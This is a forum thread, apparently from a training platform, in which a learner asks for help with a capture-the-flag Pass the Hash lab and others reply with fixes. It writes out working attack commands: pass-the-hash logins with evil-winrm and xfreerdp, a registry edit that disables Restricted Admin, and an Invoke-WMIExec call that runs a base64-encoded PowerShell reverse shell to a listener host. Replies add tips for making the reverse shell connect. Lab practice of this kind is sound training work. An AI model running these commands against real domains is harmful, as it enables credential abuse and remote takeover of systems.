Unable to get revershell of Pass the Hash exercise "Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, ca"

Using Julio’s hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.

i am getting difficulties in this flag, as i am login into julio account and get the powershell using this command

evil-winrm -i 10.129.132.69 -u julio -H <julio_NTLM_hash>

after this i run these command to allow rdp

  1. reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

now rdp into the julio account using this command
xfreerdp /v:10.129.132.69 /u:julio /pth:<julio_NTLM_Hash>

now i get cmd and run the nc to start listen on port 9001 (on 172.16.1.5)

now i generate payload from revshell website and run these command on the powershell which we get via evil-winrm as mentioned above

here is the command that i execute on the julio powershell

Import-Module .\Invoke-WMIExec.ps1
Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash <julio_NTLM_Hash> -Command “powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAIAAxADcAMgAuADEANgAuADEALgA1ACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==”
[+] Command executed with process ID 4976 on DC01

but i did not get the reverse shell on julio cmd , julio cmd shows its ip as 172.16.1.5 and DC01 show ip 172.16.1.10

for generating reverse shell payload i use this ip and port (172.16.1.5 and 9001)

please help me to solve this chellenge and explain me what mistake i have made anny concept that is still not clear to me

1 Like

If you need a bit of help still then check out the comment section in this post. It should help you out quite a bit. hope t his helps you out as much as it did to me

1 Like

facing same issue were you able to solve it ?

I have solved it, any future readers, here’s a heads up,

  1. Make sure you are using Powershell #3 (base64) [it is below Powershell #4 (TLS)] and not the Powershell #3 and then selecting the base 64 encoding to generate the code.
  2. While generating the base64 code make sure encoding is set to none (if you choose it, it will basically encode the command twice which won’t work)
  3. Use the correct IP for listener, use ipconfig to check the ip (dont confuse it with target machine ip).
  4. The port i used was 443, not sure if it works with any other port (Maybe you can try).